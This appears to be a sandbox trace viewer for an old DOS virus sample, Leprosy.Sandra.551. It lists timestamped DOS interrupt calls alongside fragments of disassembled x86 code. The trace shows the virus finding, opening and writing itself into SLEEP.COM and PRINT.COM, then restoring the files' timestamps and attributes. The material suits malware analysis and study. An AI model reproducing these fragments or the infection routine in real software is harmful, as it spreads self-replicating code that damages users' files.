Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Sandra.551

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:50.932425322Z 44 PC: 12b2f | Get time 0x12b2f: cmp byte ptr [0x106], 0
0x12b34: je 0x12b36
0x12b36: cmp dl, 0
0x12b39: je 0x12b2b
0x12b3b: mov byte ptr [0x106], dl
0x12b3f: mov byte ptr [0x174], 0
0x12b44: mov byte ptr [0x175], 2
0x12b49: mov byte ptr [0x17e], 0
0x12b4e: mov cx, 0x27
0x12b51: mov dx, 0x151
0x12b54: mov ah, 0x4e
0x12b56: int 0x21
0x12b58: cmp ax, 0x12
0x12b5b: je 0x12b60
0x12b5d: call 0x12b82
0x12b60: mov cx, 0x27
0x12b63: mov dx, 0x157
0x12b66: mov ah, 0x4e
0x12b68: int 0x21
0x12b6a: cmp ax, 0x12
2018-12-17T22:59:50.935537066Z 78 PC: 12b58 | Find first file
2018-12-17T22:59:50.941508257Z 78 PC: 12b6a | Find first file
2018-12-17T22:59:50.947471874Z 67 PC: 12ba3 | Get or set file attributes
2018-12-17T22:59:50.96402719Z 61 PC: 12ba9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:50.971431716Z 63 PC: 12bb8 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:59:50.977898958Z 62 PC: 12bec | Close file
2018-12-17T22:59:50.98116023Z 61 PC: 12bf5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:50.994668483Z 44 PC: 12a59 | Get time 0x12a59: xor dh, dh
0x12a5b: rcr dl, 1
0x12a5d: rcr dl, 1
0x12a5f: mov cx, 0x227
0x12a62: add cx, dx
0x12a64: sti
0x12a65: mov ah, 0x20
0x12a67: add ah, 0x20
0x12a6a: cli
0x12a6b: mov dx, 0x100
0x12a6e: cli
0x12a6f: int 0x21
0x12a71: nop
0x12a72: call 0x12a77
0x12a75: nop
0x12a76: ret
0x12a77: mov bx, 0x151
0x12a7a: cli
0x12a7b: mov ah, byte ptr [bx]
0x12a7d: cli
2018-12-17T22:59:50.998150337Z 64 PC: 12a71 | Write file or device (Write 695 bytes on handle 5)
2018-12-17T22:59:51.007232168Z 87 PC: 12c1d | Get or set file date and time
2018-12-17T22:59:51.009142837Z 62 PC: 12c25 | Close file
2018-12-17T22:59:51.017257469Z 67 PC: 12c32 | Get or set file attributes
2018-12-17T22:59:51.022192016Z 79 PC: 12bdc | Find next file
2018-12-17T22:59:51.027033225Z 67 PC: 12ba3 | Get or set file attributes
2018-12-17T22:59:51.03751973Z 61 PC: 12ba9 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:51.043827567Z 63 PC: 12bb8 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:59:51.051254592Z 62 PC: 12bec | Close file
2018-12-17T22:59:51.053207141Z 61 PC: 12bf5 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:51.0655411Z 44 PC: 12a59 | Get time 0x12a59: xor dh, dh
0x12a5b: rcr dl, 1
0x12a5d: rcr dl, 1
0x12a5f: mov cx, 0x227
0x12a62: add cx, dx
0x12a64: sti
0x12a65: mov ah, 0x20
0x12a67: add ah, 0x20
0x12a6a: cli
0x12a6b: mov dx, 0x100
0x12a6e: cli
0x12a6f: int 0x21
0x12a71: nop
0x12a72: call 0x12a77
0x12a75: nop
0x12a76: ret
0x12a77: mov bx, 0x151
0x12a7a: cli
0x12a7b: mov ah, byte ptr [bx]
0x12a7d: cli
2018-12-17T22:59:51.069171509Z 64 PC: 12a71 | Write file or device (Write 569 bytes on handle 5)
2018-12-17T22:59:51.077451085Z 87 PC: 12c1d | Get or set file date and time
2018-12-17T22:59:51.078868163Z 62 PC: 12c25 | Close file
2018-12-17T22:59:51.087264522Z 67 PC: 12c32 | Get or set file attributes